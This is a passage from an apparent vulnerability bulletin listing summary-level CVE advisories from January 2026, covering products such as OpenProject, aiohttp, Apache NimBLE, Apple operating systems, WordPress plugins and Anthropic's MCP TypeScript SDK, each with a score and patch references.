| opf--openproject | OpenProject is an open-source, web-based project management software. Prior to version 16.6.2, a low privileged logged-in user can view the full names of other users. Since user IDs are assigned sequentially and predictably (e.g., 1 to 1000), an attacker can extract a complete list of all users' full names by iterating through these URLs. The same behavior can also be reproduced via the OpenProject API, allowing automated retrieval of full names through the API as well. This issue has been patched in version 16.6.2. Those who are unable to upgrade may apply the patch manually. | 2026-01-10 | 3.5 | CVE-2026-22602 | https://github.com/opf/openproject/security/advisories/GHSA-7fvx-9h6h-g82j https://github.com/opf/openproject/pull/21281 https://github.com/opf/openproject/commit/fb39a779f521d9b08f1e0c9e8aff2b6d4643ea37 https://github.com/opf/openproject/releases/tag/v16.6.2 |
| Palantir--com.palantir.acme:gotham-default-apps-bundle | ### Details On October 1, 2025, Palantir discovered that images uploaded through the Dossier front-end app were not being marked correctly with the proper security levels. The regression was traced back to a change in May 2025, which was meant to allow file uploads to be shared among different artifacts (e.g. other dossiers and presentations). On deployments configured with CBAC, the front-end would present a security picker dialog to set the security level on the uploads, thereby mitigating the issue. On deployments without a CBAC configuration, no security picker dialog appears, leading to a security level of CUSTOM with no markings or datasets selected. The resulting markings and groups for the file uploads thus will be only those added by the "Default authorization rules" defined in the Auth Chooser configuration. On most environments, it is expected that the "Default authorization rules" only add the Everyone group. | 2026-01-09 | 3.5 | CVE-2025-62487 | https://palantir.safebase.us/?tcuUid=c91a1b4f-72e7-4959-9e2d-3a341e5c7a1f |
| PHPGurukul--Staff Leave Management System | A flaw has been found in PHPGurukul Staff Leave Management System 1.0. The affected element is the function ADD_STAFF/UPDATE_STAFF of the file /staffleave/slms/slms/adminviews.py of the component SVG File Handler. Executing a manipulation of the argument profile_pic can lead to cross site scripting. The attack can be executed remotely. The exploit has been published and may be used. | 2026-01-08 | 2.4 | CVE-2026-0730 | VDB-340127 | PHPGurukul Staff Leave Management System SVG File adminviews.py UPDATE_STAFF cross site scripting VDB-340127 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #733160 | PHPGurukul Staff Leave Management System v1.0 Cross Site Scripting https://github.com/rsecroot/Staff-Leave-Management-System/blob/main/Cross%20Site%20Scripting.md https://phpgurukul.com/ |
| Progress--MOVEit Transfer | Unverified Password Change vulnerability in Progress MOVEit Transfer on Windows (REST API modules).This issue affects MOVEit Transfer: from 2023.1.0 before 2023.1.3, from 2023.0.0 before 2023.0.8, from 2022.1.0 before 2022.1.11, from 2022.0.0 before 2022.0.10. | 2026-01-06 | 3.7 | CVE-2025-11235 | https://docs.progress.com/bundle/moveit-transfer-release-notes-2023_1/page/Fixed-Issues-in-2023.1.3.html |
| projectworlds--House Rental and Property Listing | A vulnerability was detected in projectworlds House Rental and Property Listing 1.0. This issue affects some unknown processing of the file /app/complaint.php. The manipulation of the argument Name results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used. | 2026-01-06 | 2.4 | CVE-2026-0642 | VDB-339685 | projectworlds House Rental and Property Listing complaint.php cross site scripting VDB-339685 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #732369 | projectworlds.com House rental And Property Listing 1.0 Cross Site Scripting https://github.com/Pick-program/CVE/issues/4 |
| questdb--ui | A security flaw has been discovered in questdb ui up to 1.11.9. Impacted is an unknown function of the component Web Console. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 1.1.10 is recommended to address this issue. The patch is identified as b42fd9f18476d844ae181a10a249e003dafb823d. You should upgrade the affected component. The vendor confirmed early that the fix "is going to be released as a part of QuestDB 9.3.0" as well. | 2026-01-10 | 3.5 | CVE-2026-0824 | VDB-340357 | questdb ui Web Console cross site scripting VDB-340357 | CTI Indicators (IOB, IOC, TTP) Submit #733253 | questdb V9.2.3(latest) xss https://github.com/59lab/dbdb/blob/main/There%20is%20a%20cross-site%20scripting(XSS)%20vulnerability%20in%20the%20QuestDB%20database.md https://github.com/questdb/questdb/releases/tag/9.3.0 https://github.com/questdb/ui/pull/519#issue-3790862030 https://github.com/questdb/ui/commit/b42fd9f18476d844ae181a10a249e003dafb823d https://github.com/questdb/ui/pull/518 |
| rankology--Rankology SEO and Analytics Tool | The Rankology SEO and Analytics Tool plugin for WordPress is vulnerable to unauthorized modification of data due to an incorrect capability check on the 'rankology_code_block' page in all versions up to, and including, 2.0. This makes it possible for authenticated attackers, with Editor-level access and above, to add header and footer code blocks. | 2026-01-07 | 2.7 | CVE-2025-12958 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c97a341c-23f5-49a9-ad05-1fb387047e3b?source=cve https://wordpress.org/plugins/rankology-seo-and-analytics-tool/ |
| SourceCodester--API Key Manager App | A vulnerability was found in SourceCodester API Key Manager App 1.0. Affected by this vulnerability is an unknown functionality of the component Import Key Handler. Performing a manipulation results in cross site scripting. The attack can be initiated remotely. | 2026-01-05 | 3.5 | CVE-2026-0580 | VDB-339472 | SourceCodester API Key Manager App Import Key cross site scripting VDB-339472 | CTI Indicators (IOB, IOC, TTP) Submit #731146 | SourceCodester API Key Manager App Using HTML, CSS and JavaScript with Source Code 0 Cross Site Scripting Submit #731290 | SourceCodester API Key Manager App Using HTML, CSS and JavaScript with Source Code 0 Basic Cross Site Scripting (Duplicate) https://www.sourcecodester.com/ |
| Xinhu--Rainrock RockOA | A security flaw has been discovered in Xinhu Rainrock RockOA up to 2.7.1. Affected is an unknown function of the file rock_page_gong.php of the component Cover Image Handler. The manipulation of the argument fengmian results in cross site scripting. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 3.5 | CVE-2026-0587 | VDB-339493 | Xinhu Rainrock RockOA Cover Image rock_page_gong.php cross site scripting VDB-339493 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725384 | Xinhu Xinhu OA V2.7.1 (earlier versions may also be affected) Stored Cross-Site Scripting (XSS) |
| Xinhu--Rainrock RockOA | A weakness has been identified in Xinhu Rainrock RockOA up to 2.7.1. Affected by this vulnerability is an unknown functionality of the file rockfun.php of the component API. This manipulation of the argument callback causes cross site scripting. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 3.5 | CVE-2026-0588 | VDB-339494 | Xinhu Rainrock RockOA API rockfun.php cross site scripting VDB-339494 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725397 | Xinhu Xinhu OA V2.7.1 JSONP Injection |
| xnx3--wangmarket | A security flaw has been discovered in xnx3 wangmarket up to 4.9. Affected by this issue is some unknown functionality of the file /admin/system/variableSave.do of the component System Variables Page. Performing a manipulation of the argument Description results in cross site scripting. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 2.4 | CVE-2025-15451 | VDB-339484 | xnx3 wangmarket System Variables variableSave.do cross site scripting VDB-339484 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724838 | https://github.com/xnx3/wangmarket wangmarket 4.9 Improper Neutralization of Alternate XSS Syntax https://www.yuque.com/cocount-eveo/lu0220/eg6s9gropfwtoz9w?singleDoc |
| xnx3--wangmarket | A weakness has been identified in xnx3 wangmarket up to 4.9. This affects the function variableList of the file /admin/system/variableList.do of the component Backend Variable Search. Executing a manipulation of the argument Description can lead to cross site scripting. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 2.4 | CVE-2025-15452 | VDB-339485 | xnx3 wangmarket Backend Variable Search variableList.do variableList cross site scripting VDB-339485 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724840 | https://github.com/xnx3/wangmarket wangmarket 4.9 Improper Neutralization of Alternate XSS Syntax https://www.yuque.com/cocount-eveo/lu0220/flbu025pfmwgudmg?singleDoc |
| zhanglun--lettura | A vulnerability was detected in zhanglun lettura up to 0.1.22. This issue affects some unknown processing of the file src/components/ArticleView/ContentRender.tsx of the component RSS Handler. The manipulation results in cross site scripting. The attack can be executed remotely. This attack is characterized by high complexity. The exploitability is assessed as difficult. The exploit is now public and may be used. The patch is identified as 67213093db9923e828a6e3fd8696a998c85da2d4. It is best practice to apply a patch to resolve this issue. | 2026-01-05 | 3.1 | CVE-2025-15454 | VDB-339487 | zhanglun lettura RSS ContentRender.tsx cross site scripting VDB-339487 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725038 | lettura v0.1.22 XSS https://gist.github.com/youremailaddress/cba7c19a4eafcb326d0e912adf132be3 https://gist.github.com/youremailaddress/cba7c19a4eafcb326d0e912adf132be3#proof-of-concept https://github.com/zhanglun/lettura/commit/67213093db9923e828a6e3fd8696a998c85da2d4 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| _nK--nK Themes Helper | Server-Side Request Forgery (SSRF) vulnerability in _nK nK Themes Helper nk-themes-helper allows Server Side Request Forgery.This issue affects nK Themes Helper: from n/a through <= 1.7.9. | 2026-01-08 | not yet calculated | CVE-2025-22726 | https://vdp.patchstack.com/database/Wordpress/Plugin/nk-themes-helper/vulnerability/wordpress-nk-themes-helper-plugin-1-7-9-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| ACCESSALLY, INC.--AccessAlly | AccessAlly WordPress plugin versions prior to 3.3.2 contain an unauthenticated arbitrary PHP code execution vulnerability in the Login Widget. The plugin processes the login_error parameter as PHP code, allowing an attacker to supply and execute arbitrary PHP in the context of the WordPress web server process, resulting in remote code execution. | 2026-01-09 | not yet calculated | CVE-2020-36875 | https://accessally.com/software-release/accessally-3-3-2/ https://wpscan.com/vulnerability/c644de6d-098d-4889-b75d-53fd2b89ff4d/ https://www.vulncheck.com/advisories/accessally-unauthenticated-arbitrary-php-code-execution |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below of the Python HTTP parser may allow a request smuggling attack with the presence of non-ASCII characters. If a pure Python version of AIOHTTP is installed (i.e. without the usual C extensions) or AIOHTTP_NO_EXTENSIONS is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69224 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-69f9-5gxw-wvc2 https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below contain parser logic which allows non-ASCII decimals to be present in the Range header. There is no known impact, but there is the possibility that there's a method to exploit a request smuggling vulnerability. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69225 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mqqc-3gqh-h2x8 https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below enable an attacker to ascertain the existence of absolute path components through the path normalization logic for static files meant to prevent path traversal. If an application uses web.static() (not recommended for production deployments), it may be possible for an attacker to ascertain the existence of path components. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69226 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-54jq-c3m8-4m76 https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow for an infinite loop to occur when assert statements are bypassed, resulting in a DoS attack when processing a POST body. If optimizations are enabled (-O or PYTHONOPTIMIZE=1), and the application includes a handler that uses the Request.post() method, then an attacker may be able to execute a DoS attack with a specially crafted message. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69227 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jj3x-wxrx-4x23 https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow a request to be crafted in such a way that an AIOHTTP server's memory fills up uncontrollably during processing. If an application includes a handler that uses the Request.post() method, an attacker may be able to freeze the server by exhausting the memory. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69228 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6jhg-hg63-jvvf https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. In versions 3.13.2 and below, handling of chunked messages can result in excessive blocking CPU usage when receiving a large number of chunks. If an application makes use of the request.read() method in an endpoint, it may be possible for an attacker to cause the server to spend a moderate amount of blocking CPU time (e.g. 1 second) while processing the request. This could potentially lead to DoS as the server would be unable to handle other requests during that time. This issue is fixed in version 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69229 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-g84x-mcqj-x9qq https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229 https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. In versions 3.13.2 and below, reading multiple invalid cookies can lead to a logging storm. If the cookies attribute is accessed in an application, then an attacker may be able to trigger a storm of warning-level logs using a specially crafted Cookie header. This issue is fixed in 3.13.3. | 2026-01-05 | not yet calculated | CVE-2025-69230 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-fh55-r93g-j68g https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326 |
| AirVPN--Eddie | AirVPN Eddie on MacOS contains an insecure XPC service that allows local, unprivileged users to escalate their privileges to root.This issue affects Eddie: 2.24.6. | 2026-01-06 | not yet calculated | CVE-2025-14979 | https://fluidattacks.com/advisories/blink182 https://eddie.website/ https://github.com/AirVPN/Eddie |
| AITpro--BulletProof Security | Insertion of Sensitive Information Into Sent Data vulnerability in AITpro BulletProof Security bulletproof-security allows Retrieve Embedded Sensitive Data.This issue affects BulletProof Security: from n/a through <= 6.9. | 2026-01-08 | not yet calculated | CVE-2025-67931 | https://vdp.patchstack.com/database/Wordpress/Plugin/bulletproof-security/vulnerability/wordpress-bulletproof-security-plugin-6-9-sensitive-data-exposure-vulnerability?_s_id=cve |
| AmentoTech--Workreap (theme's plugin) | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AmentoTech Workreap (theme's plugin) workreap allows SQL Injection.This issue affects Workreap (theme's plugin): from n/a through <= 3.3.6. | 2026-01-08 | not yet calculated | CVE-2025-22728 | https://vdp.patchstack.com/database/Wordpress/Plugin/workreap/vulnerability/wordpress-workreap-theme-s-plugin-plugin-3-3-6-sql-injection-vulnerability?_s_id=cve |
| angular--angular | Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0, a cross-site scripting (XSS) vulnerability has been identified in the Angular Template Compiler. The vulnerability exists because Angular's internal sanitization schema fails to recognize the href and xlink:href attributes of SVG <script> elements as a Resource URL context. This issue has been patched in versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0. | 2026-01-10 | not yet calculated | CVE-2026-22610 | https://github.com/angular/angular/security/advisories/GHSA-jrmj-c5cx-3cw6 https://github.com/angular/angular/pull/66318 https://github.com/angular/angular/commit/91dc91bae4a1bbefc58bef6ef739d0e02ab44d56 |
| anibalwainstein--Effect Maker | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anibalwainstein Effect Maker effect-maker allows DOM-Based XSS.This issue affects Effect Maker: from n/a through <= 1.2.1. | 2026-01-08 | not yet calculated | CVE-2025-68867 | https://vdp.patchstack.com/database/Wordpress/Plugin/effect-maker/vulnerability/wordpress-effect-maker-plugin-1-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Anthropic--MCP TypeScript SDK | Anthropic's MCP TypeScript SDK versions up to and including 1.25.1 contain a regular expression denial of service (ReDoS) vulnerability in the UriTemplate class when processing RFC 6570 exploded array patterns. The dynamically generated regular expression used during URI matching contains nested quantifiers that can trigger catastrophic backtracking on specially crafted inputs, resulting in excessive CPU consumption. An attacker can exploit this by supplying a malicious URI that causes the Node.js process to become unresponsive, leading to a denial of service. | 2026-01-05 | not yet calculated | CVE-2026-0621 | https://github.com/modelcontextprotocol/typescript-sdk/issues/965 https://www.vulncheck.com/advisories/mcp-typescript-sdk-uritemplate-exploded-array-pattern-redos |
| Apache Software Foundation--Apache Kyuubi | Any client who can access to Apache Kyuubi Server via Kyuubi frontend protocols can bypass server-side config kyuubi.session.local.dir.allow.list and use local files which are not listed in the config. This issue affects Apache Kyuubi: from 1.6.0 through 1.10.2. Users are recommended to upgrade to version 1.10.3 or upper, which fixes the issue. | 2026-01-05 | not yet calculated | CVE-2025-66518 | https://lists.apache.org/thread/xp460bwbyzdhho34ljd4nchyt2fmhodl |
| Apache Software Foundation--Apache Mynewt NimBLE | J2EE Misconfiguration: Data Transmission Without Encryption vulnerability in Apache NimBLE. Improper handling of Pause Encryption procedure on Link Layer results in a previously encrypted connection being left in un-encrypted state allowing an eavesdropper to observe the remainder of the exchange. This issue affects Apache NimBLE: through <= 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue. | 2026-01-10 | not yet calculated | CVE-2025-52435 | https://github.com/apache/mynewt-nimble/commit/164f1c23c18a290908df76ed83fe848bfe4a4903 https://github.com/apache/mynewt-nimble/commit/ec3d75e909fa6dcadf1836fefc4432794a673d18 https://lists.apache.org/thread/ow8dzpsqfh9llfclh5fzh6z237brzc0s |
| Apache Software Foundation--Apache Mynewt NimBLE | Out-of-bounds Read vulnerability in Apache NimBLE HCI H4 driver. Specially crafted HCI event could lead to invalid memory read in H4 driver. This issue affects Apache NimBLE: through 1.8. This issue requires a broken or bogus Bluetooth controller and thus severity is considered low. Users are recommended to upgrade to version 1.9, which fixes the issue. | 2026-01-10 | not yet calculated | CVE-2025-53470 | https://github.com/apache/mynewt-nimble/commit/b973df0c6cf7b30efbf8eb2cafdc1ee843464b76 https://lists.apache.org/thread/32sm0944dyod4sdql77stgyw9xb2msc0 |
| Apache Software Foundation--Apache Mynewt NimBLE | NULL Pointer Dereference vulnerability in Apache Nimble. Missing validation of HCI connection complete or HCI command TX buffer could lead to NULL pointer dereference. This issue requires disabled asserts and broken or bogus Bluetooth controller and thus severity is considered low. This issue affects Apache NimBLE: through 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue. | 2026-01-10 | not yet calculated | CVE-2025-53477 | https://github.com/apache/mynewt-nimble/commit/0caf9baeb271ede85fcc5237ab87ddbf938600da https://github.com/apache/mynewt-nimble/commit/3160b8c4c7ff8db4e0f9badcdf7df684b151e077 https://lists.apache.org/thread/1dxthc132hwm2tzvjblrtnschcsbw2vo |
| Apache Software Foundation--Apache Mynewt NimBLE | Authentication Bypass by Spoofing vulnerability in Apache NimBLE. Receiving specially crafted Security Request could lead to removal of original bond and re-bond with impostor. This issue affects Apache NimBLE: through 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue. | 2026-01-10 | not yet calculated | CVE-2025-62235 | https://github.com/apache/mynewt-nimble/commit/41f67e391e788c5feef9030026cc5cbc5431838a https://lists.apache.org/thread/rw2mrpfwb9d9wmq4h4b6ctcd6gpkk2ho |
| Apache Software Foundation--Apache SIS | Improper Restriction of XML External Entity Reference vulnerability in Apache SIS. It is possible to write XML files in such a way that, when parsed by Apache SIS, an XML file reveals to the attacker the content of a local file on the server running Apache SIS. This vulnerability impacts the following SIS services: * Reading of GeoTIFF files having the GEO_METADATA tag defined by the Defense Geospatial Information Working Group (DGIWG). * Parsing of ISO 19115 metadata in XML format. * Parsing of Coordinate Reference Systems defined in the GML format. * Parsing of files in GPS Exchange Format (GPX). This issue affects Apache SIS from versions 0.4 through 1.5 inclusive. Users are recommended to upgrade to version 1.6, which will fix the issue. In the meantime, the security vulnerability can be avoided by launching Java with the javax.xml.accessExternalDTD system property sets to a comma-separated list of authorized protocols. For example: java -Djavax.xml.accessExternalDTD="" ... | 2026-01-05 | not yet calculated | CVE-2025-68280 | https://lists.apache.org/thread/s4ggy3zbtrrn93glgo2vn52lgcxk4bp4 |
| Apache Software Foundation--Apache Struts | Missing XML Validation vulnerability in Apache Struts, Apache Struts. This issue affects Apache Struts: from 2.0.0 before 2.2.1; Apache Struts: from 2.2.1 through 6.1.0. Users are recommended to upgrade to version 6.1.1, which fixes the issue. | 2026-01-11 | not yet calculated | CVE-2025-68493 | https://cwiki.apache.org/confluence/display/WW/S2-069 |
| Apache Software Foundation--Apache Uniffle | The Uniffle HTTP client is configured to trust all SSL certificates and disables hostname verification by default. This insecure configuration exposes all REST API communication between the Uniffle CLI/client and the Uniffle Coordinator service to potential Man-in-the-Middle (MITM) attacks. This issue affects all versions from before 0.10.0. Users are recommended to upgrade to version 0.10.0, which fixes the issue. | 2026-01-07 | not yet calculated | CVE-2025-68637 | https://lists.apache.org/thread/trvdd11hmpbjno3t8rc9okr4t036ox2v |
| Apple--iOS and iPadOS | A logic issue was addressed with improved validation. This issue is fixed in iOS 26.2 and iPadOS 26.2. Restoring from a backup may prevent passcode from being required immediately after Face ID enrollment. | 2026-01-09 | not yet calculated | CVE-2025-46286 | https://support.apple.com/en-us/125884 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.2. An app may be able to access protected files within an App Sandbox container. | 2026-01-09 | not yet calculated | CVE-2025-46297 | https://support.apple.com/en-us/125886 |
| Apple--tvOS | The issue was addressed with improved memory handling. This issue is fixed in tvOS 26.2, Safari 26.2, watchOS 26.2, visionOS 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2026-01-09 | not yet calculated | CVE-2025-46298 | https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| Apple--tvOS | A memory initialization issue was addressed with improved memory handling. This issue is fixed in tvOS 26.2, Safari 26.2, watchOS 26.2, visionOS 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2. Processing maliciously crafted web content may disclose internal states of the app. | 2026-01-09 | not yet calculated | CVE-2025-46299 | https://support.apple.com/en-us/125889 https://support.apple.com/en-us/125892 https://support.apple.com/en-us/125884 https://support.apple.com/en-us/125891 https://support.apple.com/en-us/125886 https://support.apple.com/en-us/125890 |
| armurox--loggingredactor | Logging Redactor is a Python library designed to redact sensitive data in logs based on regex patterns and / or dictionary keys. Prior to version 0.0.6, non-string types are converted into string types, leading to type errors in %d conversions. The problem has been patched in version 0.0.6. No known workarounds are available. | 2026-01-08 | not yet calculated | CVE-2026-22041 | https://github.com/armurox/loggingredactor/security/advisories/GHSA-rvjx-cfjh-5mc9 https://github.com/armurox/loggingredactor/issues/7 https://github.com/armurox/loggingredactor/releases/tag/0.0.6 |
| Arraytics--Timetics | Authentication Bypass Using an Alternate Path or Channel vulnerability in Arraytics Timetics timetics allows Authentication Abuse.This issue affects Timetics: from n/a through <= 1.0.46. | 2026-01-08 | not yet calculated | CVE-2025-67915 | https://vdp.patchstack.com/database/Wordpress/Plugin/timetics/vulnerability/wordpress-timetics-plugin-1-0-46-broken-authentication-vulnerability?_s_id=cve |
| Aruba.it Dev--Aruba HiSpeed Cache | Missing Authorization vulnerability in Aruba.it Dev Aruba HiSpeed Cache aruba-hispeed-cache allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Aruba HiSpeed Cache: from n/a through < 3.0.3. | 2026-01-08 | not yet calculated | CVE-2025-67913 | https://vdp.patchstack.com/database/Wordpress/Plugin/aruba-hispeed-cache/vulnerability/wordpress-aruba-hispeed-cache-plugin-3-0-3-broken-access-control-vulnerability?_s_id=cve |
| Asseco--AMDX | Asseco ADMX system is used for processing medical records. It allows logged in users to access medical files belonging to other users through manipulation of GET arguments containing document IDs. This issue has been fixed in 6.09.01.62 version of ADMX. | 2026-01-08 | not yet calculated | CVE-2025-4596 | https://cert.pl/en/posts/2026/01/CVE-2025-4596 |
| Asseco--InfoMedica Plus | Asseco InfoMedica is a comprehensive solution used to manage both administrative and medical tasks in the healthcare sector. A low privileged user is able to obtain encoded passwords of all other accounts (including main administrator) due to lack of granularity in access control. Chained exploitation of this vulnerability and CVE-2025-8307 allows an attacker to escalate privileges. This vulnerability has been fixed in versions 4.50.1 and 5.38.0 | 2026-01-08 | not yet calculated | CVE-2025-8306 | https://cert.pl/en/posts/2026/01/CVE-2025-8306/ |
| Asseco--InfoMedica Plus | Asseco InfoMedica is a comprehensive solution used to manage both administrative and medical tasks in the healthcare sector. Passwords of all users are stored in a database in an encoded format. An attacker in possession of these encoded passwords is able to decode them by using an algorithm embedded in the client-side part of the software. This vulnerability has been fixed in versions 4.50.1 and 5.38.0 | 2026-01-08 | not yet calculated | CVE-2025-8307 | https://cert.pl/en/posts/2026/01/CVE-2025-8306/ |
| Astoundify--Jobify | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Astoundify Jobify jobify allows Reflected XSS.This issue affects Jobify: from n/a through <= 4.3.0. | 2026-01-08 | not yet calculated | CVE-2025-67916 | https://vdp.patchstack.com/database/Wordpress/Theme/jobify/vulnerability/wordpress-jobify-theme-4-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ASUS--ASCI | An uncontrolled DLL loading path vulnerability exists in AsusSoftwareManagerAgent. A local attacker may influence the application to load a DLL from an attacker-controlled location, potentially resulting in arbitrary code execution. Refer to the ' Security Update for MyASUS' section on the ASUS Security Advisory for more information. | 2026-01-06 | not yet calculated | CVE-2025-12793 | https://www.asus.com/security-advisory |
| AuntyFey--AuntyFey Smart Combination Lock | AuntyFey Smart Combination Lock firmware versions as of 2025-12-24 contain a vulnerability that allows an unauthenticated attacker within Bluetooth Low Energy (BLE) range to cause a denial of service by repeatedly initiating BLE connections. Sustained connection attempts interrupt keypad authentication input and repeatedly force the device into lockout states, preventing legitimate users from unlocking the device. | 2026-01-07 | not yet calculated | CVE-2025-15474 | https://github.com/nsm-barii/ble-smartlock-dos https://www.amazon.com/dp/B0F9L1M4XG https://www.vulncheck.com/advisories/auntyfey-smart-combination-lock-ble-connection-flood-dos |
| badkeys--badkeys | badkeys is a tool and library for checking cryptographic public keys for known vulnerabilities. In versions 0.0.15 and below, an attacker may inject content with ASCII control characters like vertical tabs, ANSI escape sequences, etc., that can create misleading output of the badkeys command-line tool. This impacts scanning DKIM keys (both --dkim and --dkim-dns), SSH keys (--ssh-lines mode), and filenames in various modes. This issue is fixed in version 0.0.16. | 2026-01-05 | not yet calculated | CVE-2026-21439 | https://github.com/badkeys/badkeys/security/advisories/GHSA-wjpc-4f29-83h3 https://github.com/badkeys/badkeys/issues/40 https://github.com/badkeys/badkeys/commit/635a2f3b1b50a895d8b09ec8629efc06189f349a https://github.com/badkeys/badkeys/commit/de631f69f040974bb5fb442cdab9a1d904c64087 |
| BBR Plugins--Better Business Reviews | Missing Authorization vulnerability in BBR Plugins Better Business Reviews better-business-reviews allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Better Business Reviews: from n/a through <= 0.1.1. | 2026-01-06 | not yet calculated | CVE-2025-69354 | https://vdp.patchstack.com/database/Wordpress/Plugin/better-business-reviews/vulnerability/wordpress-better-business-reviews-plugin-0-1-1-broken-access-control-vulnerability?_s_id=cve |
| bdthemes--Ultimate Store Kit Elementor Addons | Missing Authorization vulnerability in bdthemes Ultimate Store Kit Elementor Addons ultimate-store-kit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Store Kit Elementor Addons: from n/a through <= 2.9.4. | 2026-01-06 | not yet calculated | CVE-2025-69336 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-store-kit/vulnerability/wordpress-ultimate-store-kit-elementor-addons-plugin-2-9-4-broken-access-control-vulnerability?_s_id=cve |
| BeeS Software Solutions--BET ePortal | BeeS Software Solutions BET Portal contains an SQL injection vulnerability in the login functionality of affected sites. The vulnerability enables arbitrary SQL commands to be executed on the backend database. | 2026-01-09 | not yet calculated | CVE-2025-14598 | https://cloudilyaerp.com/ https://afnaan.me/cve/cve-2025-14598 https://github.com/Afnaan-Ahmed/CVE-2025-14598 |
| beeteam368--VidMov | Path Traversal: '.../...//' vulnerability in beeteam368 VidMov vidmov allows Path Traversal.This issue affects VidMov: from n/a through <= 2.3.8. | 2026-01-08 | not yet calculated | CVE-2025-67914 | https://vdp.patchstack.com/database/Wordpress/Theme/vidmov/vulnerability/wordpress-vidmov-theme-2-3-8-path-traversal-vulnerability?_s_id=cve |
